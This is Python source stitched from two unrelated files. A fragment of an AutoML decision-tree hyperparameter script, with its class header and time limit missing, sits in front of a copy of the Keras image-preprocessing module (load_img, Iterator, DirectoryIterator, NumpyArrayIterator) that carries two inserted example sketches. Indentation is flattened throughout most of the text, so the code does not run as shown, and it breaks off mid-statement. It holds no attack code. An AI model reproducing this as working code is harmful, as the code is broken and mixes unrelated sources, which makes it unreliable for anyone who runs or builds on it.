def get_hyperparameter_search_space(dataset_properties=None, optimizer='smac'):
if optimizer == 'smac':
cs = ConfigurationSpace()
criterion = CategoricalHyperparameter(
"criterion", ["gini", "entropy"], default_value="gini")
max_depth_factor = UniformFloatHyperparameter(
'max_depth_factor', 0., 2., default_value=0.5)
min_samples_split = UniformIntegerHyperparameter(
"min_samples_split", 2, 20, default_value=2)
min_samples_leaf = UniformIntegerHyperparameter(
"min_samples_leaf", 1, 20, default_value=1)
min_weight_fraction_leaf = Constant("min_weight_fraction_leaf", 0.0)
max_features = UnParametrizedHyperparameter('max_features', 1.0)
max_leaf_nodes = UnParametrizedHyperparameter("max_leaf_nodes", "None")
min_impurity_decrease = UnParametrizedHyperparameter('min_impurity_decrease', 0.0)
cs.add_hyperparameters([criterion, max_features, max_depth_factor,
min_samples_split, min_samples_leaf,
min_weight_fraction_leaf, max_leaf_nodes,
min_impurity_decrease])
return cs
print('==> Start to evaluate with Budget %d' % time_limit)
iris = load_iris()
X, y = iris.data, iris.target
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=1)
dm = DataManager(X_train, y_train)
train_data = dm.get_data_node(X_train, y_train)
test_data = dm.get_data_node(X_test, y_test)
save_dir = './data/eval_exps/soln-ml'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
add_classifier(UserDefinedDecisionTree)
clf = Classifier(time_limit=time_limit,
output_dir=save_dir,
include_algorithms=['UserDefinedDecisionTree'],
random_state=1,
metric='acc',
n_jobs=1)
_start_time = time.time()
_iter_id = 0
clf.fit(train_data)
pred = clf.predict(test_data)
print(balanced_accuracy_score(test_data.data[1], pred))
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
# pylint: disable=g-import-not-at-top
# pylint: disable=g-classes-have-attributes
# pylint: disable=g-direct-tensorflow-import
"""Utilies for image preprocessing and augmentation.
Warning: `tf.keras.preprocessing.image` APIs do not operate on tensors and are
not recommended for new code. Prefer loading data with
`tf.keras.utils.image_dataset_from_directory`, and then transforming the output
`tf.data.Dataset` with preprocessing layers. For more information, see the
tutorials for [loading images](
https://www.tensorflow.org/tutorials/load_data/images) and [augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as the
[preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
"""
import collections
import io
import multiprocessing
import os
import pathlib
import threading
import warnings
from keras import backend
from keras.utils import data_utils
import numpy as np
from tensorflow.python.util.tf_export import keras_export
try:
import scipy
from scipy import linalg # pylint: disable=unused-import
from scipy import ndimage # pylint: disable=unused-import
except ImportError:
pass
try:
from PIL import Image as pil_image
from PIL import ImageEnhance
except ImportError:
pil_image = None
ImageEnhance = None
if pil_image is not None:
_PIL_INTERPOLATION_METHODS = {
'nearest': pil_image.NEAREST,
'bilinear': pil_image.BILINEAR,
'bicubic': pil_image.BICUBIC,
'hamming': pil_image.HAMMING,
'box': pil_image.BOX,
'lanczos': pil_image.LANCZOS,
}
@keras_export('keras.utils.array_to_img',
'keras.preprocessing.image.array_to_img')
def array_to_img(x, data_format=None, scale=True, dtype=None):
"""Converts a 3D Numpy array to a PIL Image instance.
Usage:
```python
from PIL import Image
img = np.random.random(size=(100, 100, 3))
pil_img = tf.keras.preprocessing.image.array_to_img(img)
```
Args:
x: Input data, in any form that can be converted to a Numpy array.
data_format: Image data format, can be either "channels_first" or
"channels_last". Defaults to `None`, in which case the global setting
`tf.keras.backend.image_data_format()` is used (unless you changed it,
it defaults to "channels_last").
scale: Whether to rescale the image such that minimum and maximum values
are 0 and 255 respectively. Defaults to `True`.
dtype: Dtype to use. Default to `None`, in which case the global setting
`tf.keras.backend.floatx()` is used (unless you changed it, it defaults
to "float32")
Returns:
A PIL Image instance.
Raises:
ImportError: if PIL is not available.
ValueError: if invalid `x` or `data_format` is passed.
"""
if data_format is None:
data_format = backend.image_data_format()
if dtype is None:
dtype = backend.floatx()
if pil_image is None:
raise ImportError('Could not import PIL.Image. '
'The use of `array_to_img` requires PIL.')
x = np.asarray(x, dtype=dtype)
if x.ndim != 3:
raise ValueError('Expected image array to have rank 3 (single image). '
f'Got array with shape: {x.shape}')
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError(f'Invalid data_format: {data_format}')
# Original Numpy array x has format (height, width, channel)
# or (channel, height, width)
# but target PIL image has format (width, height, channel)
if data_format == 'channels_first':
x = x.transpose(1, 2, 0)
if scale:
x = x - np.min(x)
x_max = np.max(x)
if x_max != 0:
x /= x_max
x *= 255
if x.shape[2] == 4:
# RGBA
return pil_image.fromarray(x.astype('uint8'), 'RGBA')
elif x.shape[2] == 3:
# RGB
return pil_image.fromarray(x.astype('uint8'), 'RGB')
elif x.shape[2] == 1:
# grayscale
if np.max(x) > 255:
# 32-bit signed integer grayscale image. PIL mode "I"
return pil_image.fromarray(x[:, :, 0].astype('int32'), 'I')
return pil_image.fromarray(x[:, :, 0].astype('uint8'), 'L')
else:
raise ValueError(f'Unsupported channel number: {x.shape[2]}')
@keras_export('keras.utils.img_to_array',
'keras.preprocessing.image.img_to_array')
def img_to_array(img, data_format=None, dtype=None):
"""Converts a PIL Image instance to a Numpy array.
Usage:
```python
from PIL import Image
img_data = np.random.random(size=(100, 100, 3))
img = tf.keras.preprocessing.image.array_to_img(img_data)
array = tf.keras.preprocessing.image.img_to_array(img)
```
Args:
img: Input PIL Image instance.
data_format: Image data format, can be either "channels_first" or
"channels_last". Defaults to `None`, in which case the global setting
`tf.keras.backend.image_data_format()` is used (unless you changed it,
it defaults to "channels_last").
dtype: Dtype to use. Default to `None`, in which case the global setting
`tf.keras.backend.floatx()` is used (unless you changed it, it defaults
to "float32")
Returns:
A 3D Numpy array.
Raises:
ValueError: if invalid `img` or `data_format` is passed.
"""
if data_format is None:
data_format = backend.image_data_format()
if dtype is None:
dtype = backend.floatx()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError(f'Unknown data_format: {data_format}')
# Numpy array x has format (height, width, channel)
# or (channel, height, width)
# but original PIL image has format (width, height, channel)
x = np.asarray(img, dtype=dtype)
if len(x.shape) == 3:
if data_format == 'channels_first':
x = x.transpose(2, 0, 1)
elif len(x.shape) == 2:
if data_format == 'channels_first':
x = x.reshape((1, x.shape[0], x.shape[1]))
else:
x = x.reshape((x.shape[0], x.shape[1], 1))
else:
raise ValueError(f'Unsupported image shape: {x.shape}')
return x
@keras_export('keras.utils.save_img', 'keras.preprocessing.image.save_img')
def save_img(path, x, data_format=None, file_format=None, scale=True, **kwargs):
"""Saves an image stored as a Numpy array to a path or file object.
Args:
path: Path or file object.
x: Numpy array.
data_format: Image data format, either "channels_first" or
"channels_last".
file_format: Optional file format override. If omitted, the format to use
is determined from the filename extension. If a file object was used
instead of a filename, this parameter should always be used.
scale: Whether to rescale image values to be within `[0, 255]`.
**kwargs: Additional keyword arguments passed to `PIL.Image.save()`.
"""
if data_format is None:
data_format = backend.image_data_format()
img = array_to_img(x, data_format=data_format, scale=scale)
if img.mode == 'RGBA' and (file_format == 'jpg' or file_format == 'jpeg'):
warnings.warn('The JPG format does not support '
'RGBA images, converting to RGB.')
img = img.convert('RGB')
img.save(path, format=file_format, **kwargs)
@keras_export('keras.utils.load_img', 'keras.preprocessing.image.load_img')
def load_img(path,
grayscale=False,
color_mode='rgb',
target_size=None,
interpolation='nearest',
keep_aspect_ratio=False):
"""Loads an image into PIL format.
Usage:
```
image = tf.keras.preprocessing.image.load_img(image_path)
input_arr = tf.keras.preprocessing.image.img_to_array(image)
input_arr = np.array([input_arr]) # Convert single image to a batch.
predictions = model.predict(input_arr)
```
Args:
path: Path to image file.
grayscale: DEPRECATED use `color_mode="grayscale"`.
color_mode: One of "grayscale", "rgb", "rgba". Default: "rgb". The desired
image format.
target_size: Either `None` (default to original size) or tuple of ints
`(img_height, img_width)`.
interpolation: Interpolation method used to resample the image if the
target size is different from that of the loaded image. Supported
methods are "nearest", "bilinear", and "bicubic". If PIL version 1.1.3
or newer is installed, "lanczos" is also supported. If PIL version 3.4.0
or newer is installed, "box" and "hamming" are also supported. By
default, "nearest" is used.
keep_aspect_ratio: Boolean, whether to resize images to a target
size without aspect ratio distortion. The image is cropped in
the center with target aspect ratio before resizing.
Returns:
A PIL Image instance.
Raises:
ImportError: if PIL is not available.
ValueError: if interpolation method is not supported.
"""
if grayscale:
warnings.warn('grayscale is deprecated. Please use '
'color_mode = "grayscale"')
color_mode = 'grayscale'
if pil_image is None:
raise ImportError('Could not import PIL.Image. '
'The use of `load_img` requires PIL.')
if isinstance(path, io.BytesIO):
img = pil_image.open(path)
elif isinstance(path, (pathlib.Path, bytes, str)):
if isinstance(path, pathlib.Path):
path = str(path.resolve())
with open(path, 'rb') as f:
img = pil_image.open(io.BytesIO(f.read()))
else:
raise TypeError('path should be path-like or io.BytesIO'
', not {}'.format(type(path)))
if color_mode == 'grayscale':
# if image is not already an 8-bit, 16-bit or 32-bit grayscale image
# convert it to an 8-bit grayscale image.
if img.mode not in ('L', 'I;16', 'I'):
img = img.convert('L')
elif color_mode == 'rgba':
if img.mode != 'RGBA':
img = img.convert('RGBA')
elif color_mode == 'rgb':
if img.mode != 'RGB':
img = img.convert('RGB')
else:
raise ValueError('color_mode must be "grayscale", "rgb", or "rgba"')
if target_size is not None:
width_height_tuple = (target_size[1], target_size[0])
if img.size != width_height_tuple:
if interpolation not in _PIL_INTERPOLATION_METHODS:
raise ValueError('Invalid interpolation method {} specified. Supported '
'methods are {}'.format(
interpolation,
', '.join(_PIL_INTERPOLATION_METHODS.keys())))
resample = _PIL_INTERPOLATION_METHODS[interpolation]
if keep_aspect_ratio:
width, height = img.size
target_width, target_height = width_height_tuple
crop_height = (width * target_height) // target_width
crop_width = (height * target_width) // target_height
# Set back to input height / width
# if crop_height / crop_width is not smaller.
crop_height = min(height, crop_height)
crop_width = min(width, crop_width)
crop_box_hstart = (height - crop_height) // 2
crop_box_wstart = (width - crop_width) // 2
crop_box_wend = crop_box_wstart + crop_width
crop_box_hend = crop_box_hstart + crop_height
crop_box = [
crop_box_wstart, crop_box_hstart, crop_box_wend, crop_box_hend
]
img = img.resize(width_height_tuple, resample, box=crop_box)
else:
img = img.resize(width_height_tuple, resample)
return img
@keras_export('keras.preprocessing.image.Iterator')
class Iterator(data_utils.Sequence):
"""Base class for image data iterators.
Warning: `tf.keras.preprocessing.image.Iterator` is not recommended for
new code. Prefer loading images with
`tf.keras.utils.image_dataset_from_directory` and transforming the output
`tf.data.Dataset` with preprocessing layers. For more information, see the
tutorials for [loading images](
https://www.tensorflow.org/tutorials/load_data/images) and
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Every `Iterator` must implement the `_get_batches_of_transformed_samples`
method.
Args:
n: Integer, total number of samples in the dataset to loop over.
batch_size: Integer, size of a batch.
shuffle: Boolean, whether to shuffle the data between epochs.
seed: Random seeding for data shuffling.
"""
white_list_formats = ('png', 'jpg', 'jpeg', 'bmp', 'ppm', 'tif', 'tiff')
def __init__(self, n, batch_size, shuffle, seed):
self.n = n
self.batch_size = batch_size
self.seed = seed
self.shuffle = shuffle
self.batch_index = 0
self.total_batches_seen = 0
self.lock = threading.Lock()
self.index_array = None
self.index_generator = self._flow_index()
def _set_index_array(self):
self.index_array = np.arange(self.n)
if self.shuffle:
self.index_array = np.random.permutation(self.n)
def __getitem__(self, idx):
if idx >= len(self):
raise ValueError('Asked to retrieve element {idx}, '
'but the Sequence '
'has length {length}'.format(idx=idx, length=len(self)))
if self.seed is not None:
np.random.seed(self.seed + self.total_batches_seen)
self.total_batches_seen += 1
if self.index_array is None:
self._set_index_array()
index_array = self.index_array[self.batch_size * idx:self.batch_size *
(idx + 1)]
return self._get_batches_of_transformed_samples(index_array)
def __len__(self):
return (self.n + self.batch_size - 1) // self.batch_size # round up
def on_epoch_end(self):
self._set_index_array()
def reset(self):
self.batch_index = 0
def _flow_index(self):
# Ensure self.batch_index is 0.
self.reset()
while 1:
if self.seed is not None:
np.random.seed(self.seed + self.total_batches_seen)
if self.batch_index == 0:
self._set_index_array()
if self.n == 0:
# Avoiding modulo by zero error
current_index = 0
else:
current_index = (self.batch_index * self.batch_size) % self.n
if self.n > current_index + self.batch_size:
self.batch_index += 1
else:
self.batch_index = 0
self.total_batches_seen += 1
yield self.index_array[current_index:current_index + self.batch_size]
def __iter__(self):
# Needed if we want to do something like:
# for x, y in data_gen.flow(...):
return self
def __next__(self, *args, **kwargs):
return self.next(*args, **kwargs)
def next(self):
"""For python 2.x.
Returns:
The next batch.
"""
with self.lock:
index_array = next(self.index_generator)
# The transformation of images is not under thread lock
# so it can be done in parallel
return self._get_batches_of_transformed_samples(index_array)
def _get_batches_of_transformed_samples(self, index_array):
"""Gets a batch of transformed samples.
Args:
index_array: Array of sample indices to include in batch.
Returns:
A batch of transformed samples.
"""
raise NotImplementedError
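# Hedged sketch of the subclassing contract described in the `Iterator`
# docstring above: a minimal iterator over an in-memory array only needs to
# implement `_get_batches_of_transformed_samples`. The class name below is
# illustrative and not part of the Keras API.
class _ArrayIterator(Iterator):
  """Minimal example iterator yielding raw (untransformed) array batches."""
  def __init__(self, data, batch_size=32, shuffle=True, seed=None):
    self.data = np.asarray(data)
    super().__init__(self.data.shape[0], batch_size, shuffle, seed)
  def _get_batches_of_transformed_samples(self, index_array):
    # A real subclass would load and transform its samples here.
    return self.data[index_array]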
def _iter_valid_files(directory, white_list_formats, follow_links):
"""Iterates on files with extension.
Args:
directory: Absolute path to the directory
containing files to be counted
white_list_formats: Set of strings containing allowed extensions for
the files to be counted.
follow_links: Boolean, follow symbolic links to subdirectories.
Yields:
Tuple of (root, filename) with extension in `white_list_formats`.
"""
def _recursive_list(subpath):
return sorted(
os.walk(subpath, followlinks=follow_links), key=lambda x: x[0])
for root, _, files in _recursive_list(directory):
for fname in sorted(files):
if fname.lower().endswith('.tiff'):
warnings.warn('Using ".tiff" files with multiple bands '
'will cause distortion. Please verify your output.')
if fname.lower().endswith(white_list_formats):
yield root, fname
def _list_valid_filenames_in_directory(directory, white_list_formats, split,
class_indices, follow_links):
"""Lists paths of files in `subdir` with extensions in `white_list_formats`.
Args:
directory: absolute path to a directory containing the files to list.
The directory name is used as class label
and must be a key of `class_indices`.
white_list_formats: set of strings containing allowed extensions for
the files to be counted.
split: tuple of floats (e.g. `(0.2, 0.6)`) to only take into
account a certain fraction of files in each directory.
E.g.: `segment=(0.6, 1.0)` would only account for last 40 percent
of images in each directory.
class_indices: dictionary mapping a class name to its index.
follow_links: boolean, follow symbolic links to subdirectories.
Returns:
classes: a list of class indices
filenames: the path of valid files in `directory`, relative from
`directory`'s parent (e.g., if `directory` is "dataset/class1",
the filenames will be
`["class1/file1.jpg", "class1/file2.jpg", ...]`).
"""
dirname = os.path.basename(directory)
if split:
all_files = list(
_iter_valid_files(directory, white_list_formats, follow_links))
num_files = len(all_files)
start, stop = int(split[0] * num_files), int(split[1] * num_files)
valid_files = all_files[start:stop]
else:
valid_files = _iter_valid_files(directory, white_list_formats, follow_links)
classes = []
filenames = []
for root, fname in valid_files:
classes.append(class_indices[dirname])
absolute_path = os.path.join(root, fname)
relative_path = os.path.join(dirname,
os.path.relpath(absolute_path, directory))
filenames.append(relative_path)
return classes, filenames
class BatchFromFilesMixin():
"""Adds methods related to getting batches from filenames.
It includes the logic to transform image files to batches.
"""
def set_processing_attrs(self, image_data_generator, target_size, color_mode,
data_format, save_to_dir, save_prefix, save_format,
subset, interpolation, keep_aspect_ratio):
"""Sets attributes to use later for processing files into a batch.
Args:
image_data_generator: Instance of `ImageDataGenerator`
to use for random transformations and normalization.
target_size: tuple of integers, dimensions to resize input images
to.
color_mode: One of `"rgb"`, `"rgba"`, `"grayscale"`.
Color mode to read images.
data_format: String, one of `channels_first`, `channels_last`.
save_to_dir: Optional directory where to save the pictures
being yielded, in a viewable format. This is useful
for visualizing the random transformations being
applied, for debugging purposes.
save_prefix: String prefix to use for saving sample
images (if `save_to_dir` is set).
save_format: Format to use for saving sample images
(if `save_to_dir` is set).
subset: Subset of data (`"training"` or `"validation"`) if
validation_split is set in ImageDataGenerator.
interpolation: Interpolation method used to resample the image if the
target size is different from that of the loaded image.
Supported methods are "nearest", "bilinear", and "bicubic".
If PIL version 1.1.3 or newer is installed, "lanczos" is also
supported. If PIL version 3.4.0 or newer is installed, "box" and
"hamming" are also supported. By default, "nearest" is used.
keep_aspect_ratio: Boolean, whether to resize images to a target size
without aspect ratio distortion. The image is cropped in the center
with target aspect ratio before resizing.
"""
self.image_data_generator = image_data_generator
self.target_size = tuple(target_size)
self.keep_aspect_ratio = keep_aspect_ratio
if color_mode not in {'rgb', 'rgba', 'grayscale'}:
raise ValueError('Invalid color mode:', color_mode,
'; expected "rgb", "rgba", or "grayscale".')
self.color_mode = color_mode
self.data_format = data_format
if self.color_mode == 'rgba':
if self.data_format == 'channels_last':
self.image_shape = self.target_size + (4,)
else:
self.image_shape = (4,) + self.target_size
elif self.color_mode == 'rgb':
if self.data_format == 'channels_last':
self.image_shape = self.target_size + (3,)
else:
self.image_shape = (3,) + self.target_size
else:
if self.data_format == 'channels_last':
self.image_shape = self.target_size + (1,)
else:
self.image_shape = (1,) + self.target_size
self.save_to_dir = save_to_dir
self.save_prefix = save_prefix
self.save_format = save_format
self.interpolation = interpolation
if subset is not None:
validation_split = self.image_data_generator._validation_split # pylint: disable=protected-access
if subset == 'validation':
split = (0, validation_split)
elif subset == 'training':
split = (validation_split, 1)
else:
raise ValueError('Invalid subset name: %s;'
'expected "training" or "validation"' % (subset,))
else:
split = None
self.split = split
self.subset = subset
def _get_batches_of_transformed_samples(self, index_array):
"""Gets a batch of transformed samples.
Args:
index_array: Array of sample indices to include in batch.
Returns:
A batch of transformed samples.
"""
batch_x = np.zeros((len(index_array),) + self.image_shape, dtype=self.dtype)
# build batch of image data
# self.filepaths is dynamic, is better to call it once outside the loop
filepaths = self.filepaths
for i, j in enumerate(index_array):
img = load_img(
filepaths[j],
color_mode=self.color_mode,
target_size=self.target_size,
interpolation=self.interpolation,
keep_aspect_ratio=self.keep_aspect_ratio)
x = img_to_array(img, data_format=self.data_format)
# Pillow images should be closed after `load_img`,
# but not PIL images.
if hasattr(img, 'close'):
img.close()
if self.image_data_generator:
params = self.image_data_generator.get_random_transform(x.shape)
x = self.image_data_generator.apply_transform(x, params)
x = self.image_data_generator.standardize(x)
batch_x[i] = x
# optionally save augmented images to disk for debugging purposes
if self.save_to_dir:
for i, j in enumerate(index_array):
img = array_to_img(batch_x[i], self.data_format, scale=True)
fname = '{prefix}_{index}_{hash}.{format}'.format(
prefix=self.save_prefix,
index=j,
hash=np.random.randint(1e7),
format=self.save_format)
img.save(os.path.join(self.save_to_dir, fname))
# build batch of labels
if self.class_mode == 'input':
batch_y = batch_x.copy()
elif self.class_mode in {'binary', 'sparse'}:
batch_y = np.empty(len(batch_x), dtype=self.dtype)
for i, n_observation in enumerate(index_array):
batch_y[i] = self.classes[n_observation]
elif self.class_mode == 'categorical':
batch_y = np.zeros((len(batch_x), len(self.class_indices)),
dtype=self.dtype)
for i, n_observation in enumerate(index_array):
batch_y[i, self.classes[n_observation]] = 1.
elif self.class_mode == 'multi_output':
batch_y = [output[index_array] for output in self.labels]
elif self.class_mode == 'raw':
batch_y = self.labels[index_array]
else:
return batch_x
if self.sample_weight is None:
return batch_x, batch_y
else:
return batch_x, batch_y, self.sample_weight[index_array]
@property
def filepaths(self):
"""List of absolute paths to image files."""
raise NotImplementedError(
'`filepaths` property method has not been implemented in {}.'.format(
type(self).__name__))
@property
def labels(self):
"""Class labels of every observation."""
raise NotImplementedError(
'`labels` property method has not been implemented in {}.'.format(
type(self).__name__))
@property
def sample_weight(self):
raise NotImplementedError(
'`sample_weight` property method has not been implemented in {}.'
.format(type(self).__name__))
@keras_export('keras.preprocessing.image.DirectoryIterator')
class DirectoryIterator(BatchFromFilesMixin, Iterator):
"""Iterator capable of reading images from a directory on disk.
Warning: `tf.keras.preprocessing.image.DirectoryIterator` is not recommended
for new code. Prefer loading images with
`tf.keras.utils.image_dataset_from_directory` and transforming the output
`tf.data.Dataset` with preprocessing layers. For more information, see the
tutorials for [loading images](
https://www.tensorflow.org/tutorials/load_data/images) and
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Args:
directory: Path to the directory to read images from. Each subdirectory in
this directory will be considered to contain images from one class, or
alternatively you could specify class subdirectories via the `classes`
argument.
image_data_generator: Instance of `ImageDataGenerator` to use for random
transformations and normalization.
target_size: tuple of integers, dimensions to resize input images to.
color_mode: One of `"rgb"`, `"rgba"`, `"grayscale"`. Color mode to read
images.
classes: Optional list of strings, names of subdirectories containing
images from each class (e.g. `["dogs", "cats"]`). It will be computed
automatically if not set.
class_mode: Mode for yielding the targets:
- `"binary"`: binary targets (if there are only two classes),
- `"categorical"`: categorical targets,
- `"sparse"`: integer targets,
- `"input"`: targets are images identical to input images (mainly used
to work with autoencoders),
- `None`: no targets get yielded (only input images are yielded).
batch_size: Integer, size of a batch.
shuffle: Boolean, whether to shuffle the data between epochs.
seed: Random seed for data shuffling.
data_format: String, one of `channels_first`, `channels_last`.
save_to_dir: Optional directory where to save the pictures being yielded,
in a viewable format. This is useful for visualizing the random
transformations being applied, for debugging purposes.
save_prefix: String prefix to use for saving sample images (if
`save_to_dir` is set).
save_format: Format to use for saving sample images (if `save_to_dir` is
set).
subset: Subset of data (`"training"` or `"validation"`) if
validation_split is set in ImageDataGenerator.
interpolation: Interpolation method used to resample the image if the
target size is different from that of the loaded image. Supported
methods are "nearest", "bilinear", and "bicubic". If PIL version 1.1.3
or newer is installed, "lanczos" is also supported. If PIL version 3.4.0
or newer is installed, "box" and "hamming" are also supported. By
default, "nearest" is used.
keep_aspect_ratio: Boolean, whether to resize images to a target size
without aspect ratio distortion. The image is cropped in the center
with target aspect ratio before resizing.
dtype: Dtype to use for generated arrays.
"""
allowed_class_modes = {'categorical', 'binary', 'sparse', 'input', None}
def __init__(self,
directory,
image_data_generator,
target_size=(256, 256),
color_mode='rgb',
classes=None,
class_mode='categorical',
batch_size=32,
shuffle=True,
seed=None,
data_format=None,
save_to_dir=None,
save_prefix='',
save_format='png',
follow_links=False,
subset=None,
interpolation='nearest',
keep_aspect_ratio=False,
dtype=None):
if data_format is None:
data_format = backend.image_data_format()
if dtype is None:
dtype = backend.floatx()
super().set_processing_attrs(image_data_generator, target_size, color_mode,
data_format, save_to_dir, save_prefix,
save_format, subset, interpolation,
keep_aspect_ratio)
self.directory = directory
self.classes = classes
if class_mode not in self.allowed_class_modes:
raise ValueError('Invalid class_mode: {}; expected one of: {}'
.format(class_mode, self.allowed_class_modes))
self.class_mode = class_mode
self.dtype = dtype
# First, count the number of samples and classes.
self.samples = 0
if not classes:
classes = []
for subdir in sorted(os.listdir(directory)):
if os.path.isdir(os.path.join(directory, subdir)):
classes.append(subdir)
self.num_classes = len(classes)
self.class_indices = dict(zip(classes, range(len(classes))))
pool = multiprocessing.pool.ThreadPool()
# Second, build an index of the images
# in the different class subfolders.
results = []
self.filenames = []
i = 0
for dirpath in (os.path.join(directory, subdir) for subdir in classes):
results.append(
pool.apply_async(_list_valid_filenames_in_directory,
(dirpath, self.white_list_formats, self.split,
self.class_indices, follow_links)))
classes_list = []
for res in results:
classes, filenames = res.get()
classes_list.append(classes)
self.filenames += filenames
self.samples = len(self.filenames)
self.classes = np.zeros((self.samples,), dtype='int32')
for classes in classes_list:
self.classes[i:i + len(classes)] = classes
i += len(classes)
print('Found %d images belonging to %d classes.' %
(self.samples, self.num_classes))
pool.close()
pool.join()
self._filepaths = [
os.path.join(self.directory, fname) for fname in self.filenames
]
super().__init__(self.samples, batch_size, shuffle, seed)
@property
def filepaths(self):
return self._filepaths
@property
def labels(self):
return self.classes
@property # mixin needs this property to work
def sample_weight(self):
# no sample weights will be returned
return None
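# Usage sketch: a `DirectoryIterator` is normally obtained through
# `ImageDataGenerator.flow_from_directory` rather than constructed directly.
# The directory path below is a hypothetical placeholder.
def _example_directory_iterator(directory='data/train'):
  datagen = ImageDataGenerator(rescale=1. / 255)
  it = datagen.flow_from_directory(
      directory, target_size=(128, 128), class_mode='categorical',
      batch_size=8)
  # Each batch is a tuple `(batch_x, batch_y)` with shapes
  # `(batch_size, 128, 128, 3)` and `(batch_size, num_classes)`.
  batch_x, batch_y = next(it)
  return batch_x.shape, batch_y.shape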
@keras_export('keras.preprocessing.image.NumpyArrayIterator')
class NumpyArrayIterator(Iterator):
"""Iterator yielding data from a Numpy array.
Warning: `tf.keras.preprocessing.image.NumpyArrayIterator` is not recommended
for new code. Prefer loading images with
`tf.keras.utils.image_dataset_from_directory` and transforming the output
`tf.data.Dataset` with preprocessing layers. For more information, see the
tutorials for [loading images](
https://www.tensorflow.org/tutorials/load_data/images) and
[augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as
the [preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
Args:
x: Numpy array of input data or tuple. If tuple, the second element is
either another numpy array or a list of numpy arrays, each of which gets
passed through as an output without any modifications.
y: Numpy array of targets data.
image_data_generator: Instance of `ImageDataGenerator` to use for random
transformations and normalization.
batch_size: Integer, size of a batch.
shuffle: Boolean, whether to shuffle the data between epochs.
sample_weight: Numpy array of sample weights.
seed: Random seed for data shuffling.
data_format: String, one of `channels_first`, `channels_last`.
save_to_dir: Optional directory where to save the pictures being yielded,
in a viewable format. This is useful for visualizing the random
transformations being applied, for debugging purposes.
save_prefix: String prefix to use for saving sample images (if
`save_to_dir` is set).
save_format: Format to use for saving sample images (if `save_to_dir` is
set).
subset: Subset of data (`"training"` or `"validation"`) if
validation_split is set in ImageDataGenerator.
ignore_class_split: Boolean (default: False), ignore difference
in number of classes in labels across train and validation
split (useful for non-classification tasks)
dtype: Dtype to use for the generated arrays.
"""
def __init__(self,
x,
y,
image_data_generator,
batch_size=32,
shuffle=False,
sample_weight=None,
seed=None,
data_format=None,
save_to_dir=None,
save_prefix='',
save_format='png',
subset=None,
ignore_class_split=False,
dtype=None):
if data_format is None:
data_format = backend.image_data_format()
if dtype is None:
dtype = backend.floatx()
self.dtype = dtype
if isinstance(x, tuple) or isinstance(x, list):
if not isinstance(x[1], list):
x_misc = [np.asarray(x[1])]
else:
x_misc = [np.asarray(xx) for xx in x[1]]
x = x[0]
for xx in x_misc:
if len(x) != len(xx):
raise ValueError('All of the arrays in `x` '
'should have the same length. '
'Found a pair with: len(x[0]) = %s, len(x[?]) = %s' %
(len(x), len(xx)))
else:
x_misc = []
if y is not None and len(x) != len(y):
raise ValueError('`x` (images tensor) and `y` (labels) '
'should have the same length. '
'Found: x.shape = %s, y.shape = %s' %
(np.asarray(x).shape, np.asarray(y).shape))
if sample_weight is not None and len(x) != len(sample_weight):
raise ValueError('`x` (images tensor) and `sample_weight` '
'should have the same length. '
'Found: x.shape = %s, sample_weight.shape = %s' %
(np.asarray(x).shape, np.asarray(sample_weight).shape))
if subset is not None:
if subset not in {'training', 'validation'}:
raise ValueError(f'Invalid subset name: {subset}; '
'expected "training" or "validation".')
split_idx = int(len(x) * image_data_generator._validation_split)
if (y is not None and not ignore_class_split and not np.array_equal(
np.unique(y[:split_idx]), np.unique(y[split_idx:]))):
raise ValueError('Training and validation subsets '
'have different number of classes after '
'the split. If your numpy arrays are '
'sorted by the label, you might want '
'to shuffle them.')
if subset == 'validation':
x = x[:split_idx]
x_misc = [np.asarray(xx[:split_idx]) for xx in x_misc]
if y is not None:
y = y[:split_idx]
else:
x = x[split_idx:]
x_misc = [np.asarray(xx[split_idx:]) for xx in x_misc]
if y is not None:
y = y[split_idx:]
self.x = np.asarray(x, dtype=self.dtype)
self.x_misc = x_misc
if self.x.ndim != 4:
raise ValueError(
'Input data in `NumpyArrayIterator` '
'should have rank 4. You passed an array '
'with shape %s' % (self.x.shape,))
channels_axis = 3 if data_format == 'channels_last' else 1
if self.x.shape[channels_axis] not in {1, 3, 4}:
warnings.warn('NumpyArrayIterator is set to use the '
'data format convention "' + data_format + '" '
'(channels on axis ' + str(channels_axis) +
'), i.e. expected either 1, 3, or 4 '
'channels on axis ' + str(channels_axis) + '. '
'However, it was passed an array with shape ' +
str(self.x.shape) + ' (' +
str(self.x.shape[channels_axis]) + ' channels).')
if y is not None:
self.y = np.asarray(y)
else:
self.y = None
if sample_weight is not None:
self.sample_weight = np.asarray(sample_weight)
else:
self.sample_weight = None
self.image_data_generator = image_data_generator
self.data_format = data_format
self.save_to_dir = save_to_dir
self.save_prefix = save_prefix
self.save_format = save_format
super().__init__(x.shape[0], batch_size, shuffle, seed)
def _get_batches_of_transformed_samples(self, index_array):
batch_x = np.zeros(
tuple([len(index_array)] + list(self.x.shape)[1:]), dtype=self.dtype)
for i, j in enumerate(index_array):
x = self.x[j]
params = self.image_data_generator.get_random_transform(x.shape)
x = self.image_data_generator.apply_transform(
x.astype(self.dtype), params)
x = self.image_data_generator.standardize(x)
batch_x[i] = x
if self.save_to_dir:
for i, j in enumerate(index_array):
img = array_to_img(batch_x[i], self.data_format, scale=True)
fname = '{prefix}_{index}_{hash}.{format}'.format(
prefix=self.save_prefix,
index=j,
hash=np.random.randint(1e4),
